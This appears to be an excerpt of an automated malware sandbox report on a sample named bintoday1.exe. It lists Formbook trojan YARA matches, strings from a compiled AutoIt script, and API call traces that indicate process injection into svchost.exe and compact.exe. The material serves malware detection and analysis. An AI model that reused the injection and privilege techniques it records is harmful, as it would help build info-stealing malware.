Source: Yara match File source: 00000007.00000002.4023622986.00000000009D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4022626506.0000000000980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2460077708.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4026387029.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2461015937.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4023857362.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2460538181.0000000002F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4010508609.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4023622986.00000000009D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.4022626506.0000000000980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2460077708.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4026387029.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2461015937.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4023857362.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: bintoday1.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: bintoday1.exe, 00000000.00000000.2163703264.0000000000C52000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_087713b8-f
Source: bintoday1.exe, 00000000.00000000.2163703264.0000000000C52000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_4ba7caf1-4
Source: bintoday1.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_8b985d2f-9
Source: bintoday1.exe String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_8c88017a-5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0049C8E3 NtClose, 2_2_0049C8E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0047190C NtProtectVirtualMemory, 2_2_0047190C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072B60 NtClose,LdrInitializeThunk, 2_2_03072B60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_03072DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk, 2_2_030735C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03074340 NtSetContextThread, 2_2_03074340
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03074650 NtSuspendThread, 2_2_03074650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072B80 NtQueryInformationFile, 2_2_03072B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072BA0 NtEnumerateValueKey, 2_2_03072BA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072BE0 NtQueryValueKey, 2_2_03072BE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072BF0 NtAllocateVirtualMemory, 2_2_03072BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072AB0 NtWaitForSingleObject, 2_2_03072AB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072AD0 NtReadFile, 2_2_03072AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072AF0 NtWriteFile, 2_2_03072AF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072F30 NtCreateSection, 2_2_03072F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072F60 NtCreateProcessEx, 2_2_03072F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072F90 NtProtectVirtualMemory, 2_2_03072F90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072FA0 NtQuerySection, 2_2_03072FA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072FB0 NtResumeThread, 2_2_03072FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072FE0 NtCreateFile, 2_2_03072FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072E30 NtWriteVirtualMemory, 2_2_03072E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072E80 NtReadVirtualMemory, 2_2_03072E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072EA0 NtAdjustPrivilegesToken, 2_2_03072EA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072EE0 NtQueueApcThread, 2_2_03072EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072D00 NtSetInformationFile, 2_2_03072D00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072D10 NtMapViewOfSection, 2_2_03072D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072D30 NtUnmapViewOfSection, 2_2_03072D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072DB0 NtEnumerateKey, 2_2_03072DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072DD0 NtDelayExecution, 2_2_03072DD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072C00 NtQueryInformationProcess, 2_2_03072C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072C60 NtCreateKey, 2_2_03072C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072C70 NtFreeVirtualMemory, 2_2_03072C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072CA0 NtQueryInformationToken, 2_2_03072CA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072CC0 NtQueryVirtualMemory, 2_2_03072CC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072CF0 NtOpenProcess, 2_2_03072CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03073010 NtOpenDirectoryObject, 2_2_03073010
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03073090 NtSetValueKey, 2_2_03073090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030739B0 NtGetContextThread, 2_2_030739B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03073D10 NtOpenProcessToken, 2_2_03073D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03073D70 NtOpenThread, 2_2_03073D70
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD4340 NtSetContextThread,LdrInitializeThunk, 7_2_02DD4340
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD4650 NtSuspendThread,LdrInitializeThunk, 7_2_02DD4650
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2AD0 NtReadFile,LdrInitializeThunk, 7_2_02DD2AD0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2AF0 NtWriteFile,LdrInitializeThunk, 7_2_02DD2AF0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_02DD2BF0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2BE0 NtQueryValueKey,LdrInitializeThunk, 7_2_02DD2BE0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2BA0 NtEnumerateValueKey,LdrInitializeThunk, 7_2_02DD2BA0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2B60 NtClose,LdrInitializeThunk, 7_2_02DD2B60
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2EE0 NtQueueApcThread,LdrInitializeThunk, 7_2_02DD2EE0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2E80 NtReadVirtualMemory,LdrInitializeThunk, 7_2_02DD2E80
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2FE0 NtCreateFile,LdrInitializeThunk, 7_2_02DD2FE0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2FB0 NtResumeThread,LdrInitializeThunk, 7_2_02DD2FB0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2F30 NtCreateSection,LdrInitializeThunk, 7_2_02DD2F30
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2CA0 NtQueryInformationToken,LdrInitializeThunk, 7_2_02DD2CA0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2C70 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_02DD2C70
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2C60 NtCreateKey,LdrInitializeThunk, 7_2_02DD2C60
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2DD0 NtDelayExecution,LdrInitializeThunk, 7_2_02DD2DD0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2DF0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_02DD2DF0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2D10 NtMapViewOfSection,LdrInitializeThunk, 7_2_02DD2D10
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2D30 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_02DD2D30
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD35C0 NtCreateMutant,LdrInitializeThunk, 7_2_02DD35C0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD39B0 NtGetContextThread,LdrInitializeThunk, 7_2_02DD39B0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2AB0 NtWaitForSingleObject, 7_2_02DD2AB0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2B80 NtQueryInformationFile, 7_2_02DD2B80
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2EA0 NtAdjustPrivilegesToken, 7_2_02DD2EA0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2E30 NtWriteVirtualMemory, 7_2_02DD2E30
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2F90 NtProtectVirtualMemory, 7_2_02DD2F90
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2FA0 NtQuerySection, 7_2_02DD2FA0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2F60 NtCreateProcessEx, 7_2_02DD2F60
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2CC0 NtQueryVirtualMemory, 7_2_02DD2CC0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2CF0 NtOpenProcess, 7_2_02DD2CF0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2C00 NtQueryInformationProcess, 7_2_02DD2C00
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2DB0 NtEnumerateKey, 7_2_02DD2DB0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD2D00 NtSetInformationFile, 7_2_02DD2D00
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD3090 NtSetValueKey, 7_2_02DD3090
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD3010 NtOpenDirectoryObject, 7_2_02DD3010
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD3D70 NtOpenThread, 7_2_02DD3D70
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_02DD3D10 NtOpenProcessToken, 7_2_02DD3D10
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004F9020 NtCreateFile, 7_2_004F9020
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004F9190 NtReadFile, 7_2_004F9190
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004F9290 NtDeleteFile, 7_2_004F9290
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004F9340 NtClose, 7_2_004F9340
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_004F94A0 NtAllocateVirtualMemory, 7_2_004F94A0
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_00ADF9AD NtMapViewOfSection,NtMapViewOfSection, 7_2_00ADF9AD
Source: C:\Windows\SysWOW64\compact.exe Code function: 7_2_00ADFA2B NtMapViewOfSection, 7_2_00ADFA2B
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BFD5EB: CreateFileW,DeviceIoControl,CloseHandle, 0_2_00BFD5EB
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BF1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00BF1201
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BFE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_00BFE8F6
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C02046 0_2_00C02046
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00B98060 0_2_00B98060
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BF8298 0_2_00BF8298
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BCE4FF 0_2_00BCE4FF
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BC676B 0_2_00BC676B
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C24873 0_2_00C24873
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BBCAA0 0_2_00BBCAA0
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00B9CAF0 0_2_00B9CAF0
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BACC39 0_2_00BACC39
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BC6DD9 0_2_00BC6DD9
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00B991C0 0_2_00B991C0
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BAB119 0_2_00BAB119
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BB1394 0_2_00BB1394
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BB781B 0_2_00BB781B
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00B97920 0_2_00B97920
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BA997D 0_2_00BA997D
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BB7A4A 0_2_00BB7A4A
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BB7CA7 0_2_00BB7CA7
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BC9EEE 0_2_00BC9EEE
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C1BE44 0_2_00C1BE44
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_033435D0 0_2_033435D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004888C3 2_2_004888C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004728B0 2_2_004728B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00480133 2_2_00480133
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004721DC 2_2_004721DC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00486A6C 2_2_00486A6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00486AAE 2_2_00486AAE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00486AB3 2_2_00486AB3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00480353 2_2_00480353
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00473330 2_2_00473330
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0047E3D3 2_2_0047E3D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004724DD 2_2_004724DD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004724E0 2_2_004724E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0049EED3 2_2_0049EED3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FA352 2_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E3F0 2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031003E6 2_2_031003E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C02C0 2_2_030C02C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03030100 2_2_03030100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DA118 2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C8158 2_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031001AA 2_2_031001AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F81CC 2_2_030F81CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D2000 2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03064750 2_2_03064750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303C7C0 2_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305C6E0 2_2_0305C6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040535 2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03100591 2_2_03100591
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E4420 2_2_030E4420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F2446 2_2_030F2446
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EE4F6 2_2_030EE4F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FAB40 2_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F6BD7 2_2_030F6BD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303EA80 2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03056962 2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030429A0 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0310A9A6 2_2_0310A9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304A840 2_2_0304A840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03042840 2_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030268B8 2_2_030268B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E8F0 2_2_0306E8F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03082F28 2_2_03082F28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03060F30 2_2_03060F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E2F30 2_2_030E2F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B4F40 2_2_030B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BEFA0 2_2_030BEFA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03032FC8 2_2_03032FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304CFE0 2_2_0304CFE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FEE26 2_2_030FEE26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040E59 2_2_03040E59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03052E90 2_2_03052E90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FCE93 2_2_030FCE93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FEEDB 2_2_030FEEDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304AD00 2_2_0304AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DCD1F 2_2_030DCD1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03058DBF 2_2_03058DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303ADE0 2_2_0303ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040C00 2_2_03040C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0CB5 2_2_030E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03030CF2 2_2_03030CF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F132D 2_2_030F132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302D34C 2_2_0302D34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0308739A 2_2_0308739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030452A0 2_2_030452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305B2C0 2_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E12ED 2_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307516C 2_2_0307516C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302F172 2_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0310B16B 2_2_0310B16B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304B1B0 2_2_0304B1B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EF0CC 2_2_030EF0CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030470C0 2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F70E9 2_2_030F70E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FF0E0 2_2_030FF0E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FF7B0 2_2_030FF7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F16CC 2_2_030F16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F7571 2_2_030F7571
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DD5B0 2_2_030DD5B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FF43F 2_2_030FF43F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03031460 2_2_03031460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FFB76 2_2_030FFB76
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305FB80 2_2_0305FB80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B5BF0 2_2_030B5BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307DBF9 2_2_0307DBF9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FFA49 2_2_030FFA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F7A46 2_2_030F7A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B3A6C 2_2_030B3A6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DDAAC 2_2_030DDAAC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03085AA0 2_2_03085AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E1AA3 2_2_030E1AA3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EDAC6 2_2_030EDAC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D5910 2_2_030D5910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03049950 2_2_03049950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305B950 2_2_0305B950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AD800 2_2_030AD800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030438E0 2_2_030438E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030FFF09 2_2_030FFF09
